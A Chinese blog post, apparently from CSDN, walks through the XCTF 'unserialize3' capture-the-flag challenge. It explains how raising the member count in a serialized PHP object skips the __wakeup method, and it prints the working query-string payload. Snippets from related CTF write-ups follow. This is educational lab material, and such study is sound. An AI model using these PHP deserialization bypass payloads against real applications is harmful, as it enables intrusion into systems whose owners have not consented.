PHP反序列化-unserialize3(攻防世界)

最新推荐文章于 2025-02-10 21:50:33 发布
原创 最新推荐文章于 2025-02-10 21:50:33 发布 · 728 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全

本文探讨了一种PHP中绕过对象反序列化时__wakeup函数执行的解题思路。通过理解当对象成员数在序列化和反序列化过程中发生变化时,wakeup函数不会被调用的特性,可以避免触发exit('badrequests')。示例代码展示了如何通过增加序列化对象的成员数来实现这一目标。

题目:

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

解题思路:

wakeup()函数是在对象被反序列化之后被调用

但是这题如果这个函数被调用,那么程序就退出了,所以需要想办法绕过这个函数。

绕过wakeup函数执行

wakeup()有个执行漏洞:一个字符串或对象被序列化后,如果其属性被修改,则不会执行wakeup()函数,这算是一个绕过点

只要序列化的中的成员数大于实际成员数,即可绕过

new一个实例并将其序列化

<?php
class xctf
{
    public $flag = '111';

    public function __wakeup()
    {
        exit('bad requests');
    }
}

$a = new xctf();
echo serialize($a);

?>

结果:

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

上面的1代表的是对象里的参数值数,将其修改大于一即可

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

 

攻防世界】十二 --- unserialize3 --- php反序列化
qq_43168364的博客
12-25 681
题目 — unserialize3 一、writeup 一道php反序列化的题 关键点: 当审出存在反序列化漏洞时,我们将对应的那个类拿出到自己的php环境中,先用恶意字符串实例化该类然后用serialize()函数,进行序列化,将序列化好的东西抛出到环境中即可造成反序列化漏洞 当$flag='111’是可以看到flag,通过?code查询字符串来传入需要反序列化的字符串 反序列时会自动调用__wakeup() 函数,导致程序结束执行,因此要绕过 __wakeup() 函数(绕过的方法在知识点中有介绍)
攻防世界反序列化 Web_php_unserialize
zxnimud5的专栏
09-14 645
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { .
攻防世界-Webunserialize3解题思路
一个手掰橙的博客
09-23 3751
CTF解题思路
攻防世界 Web_php_unserialize 反序列化
trytowritecode的博客
10-24 497
昨天帮忙打了场比赛,web题目里也是有反序列化的题,也是利用魔术方法的调用来构造pop链,获取flag但那道题好绕我不会写,然后还有关于json的题,就发现自己好多都没学,真的打一场比赛容易把自己人都打傻掉。 这道题也是看了好久才明白的题目。 废话不多直接上代码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file =
攻防世界unserialize3
m0_73303597的博客
11-06 2290
好难啊
攻防世界_unserialize3(反序列化)
最新发布
2401_87524087的博客
02-10 704
反序列化漏洞是指在计算机程序中,当对序列化数据进行反序列化操作时,由于程序没有对输入的序列化数据进行充分的验证和过滤,导致攻击者可以构造恶意的序列化数据,从而在目标系统上执行任意代码、获取敏感信息或进行其他恶意操作的安全漏洞。
PHP 序列化与反序列化入门 攻防世界unserialize3
weixin_45971758的博客
04-12 203
serialize()unserialize()函数对魔术方法的处理:serialize()函数会检查类中是否存在一个魔术方法__sleep() 这里想没想到就是上面讲的这个函数是在序列化之前被调用的所以在序列化之前要检验有没有这个魔法函数。unserialize()函数会检查类中是否存在一个魔术方法__wakeup(),如果存在,则会先调用 __wakeup 方法,预先准备对象需要的资源。__wakeup()执行漏洞:一个字符串或对象被序列化后,如果其属性被修改,则不会执行__wakeup()函数。
攻防世界--Web进阶--Web_php_unserialize--反序列化---正则表达式---wakeup绕过----base64加密
z2560088的博客
10-10 1513
来自攻防世界的一道web进阶题,名为Web_php_unserialize 题目给出了一段php代码,应该是后台的部分源码: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file;//将file变量的文件名赋值给当前类的file。当解构出该类实例化的对象后,该对象的file就是此时赋值的fi..
序列化与反序列化--攻防世界unserialize3
qq_53755216的博客
03-16 326
对象序列化 O代表object(若是A,则代表数组) 7代表对象名字占7个字符 3 代表三个参数 s -> string i -> int serialize 序列化 unserialize 反序列化 补充知识 __sleep() 和 __wakeup(): __sleep() 方法常用于提交未提交的数据,或类似的清理操作。同时,如果有一些很大的对象,但不需要全部保存,这个功能就很好用。 与之相反,unserialize() 会检查是否存在一个 __wakeup() 方法。如果存在,则会
反序列化--攻防世界例题
qq_55992895的博客
07-09 416
反序列化
攻防世界——web——unserialize3反序列化
m0_75007575的博客
04-05 2137
一、序列化 将对象的状态信息转换为可以存储或传输的形式的过程,简单来说,就是将对象转化为字节序列的过程 二、反序列 把字节序列恢复为对象的过程称为对象反序列
攻防世界 unserialize3
weixin_52268949的博客
01-28 1539
unserialize3 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } ?code= 进入题目给出部分代码,注意发现到有个wakeup()函数,我们要想办法绕过这个函数,wakeup()有个执行漏洞:一个字符串或对象被序列化后,如果其属性被修改,则不会执行wakeup()函数,这也算是一个绕过点 我们编写exp class xctf { public $flag = '
攻防世界unserialize3 ---------- 反序列化
weixin_44632787的博客
07-24 527
攻防世界unserialize3 ---------- 反序列化 打开页面,果然。。。而且看起来挺简单的! class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 所以开始构造payload:O:4:"xctf":1:{s:4:"flag";s:3:"111";}但是这里还有个小问题… 如果直接用上面那个payload你会发现它被拦下。原因是__wakeup()这个函数 p
攻防世界-unserialize3
qq_74276395的博客
03-04 158
unserialize3
攻防世界序列化漏洞详解与利用
PHP中,`serialize`函数用于序列化对象,`unserialize`用于反序列化。然而,不正确的序列化和反序列化处理可能导致安全问题,如代码执行、信息泄露等。 以题目为例,我们看到一个名为`xctf`的类,其中包含一个...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值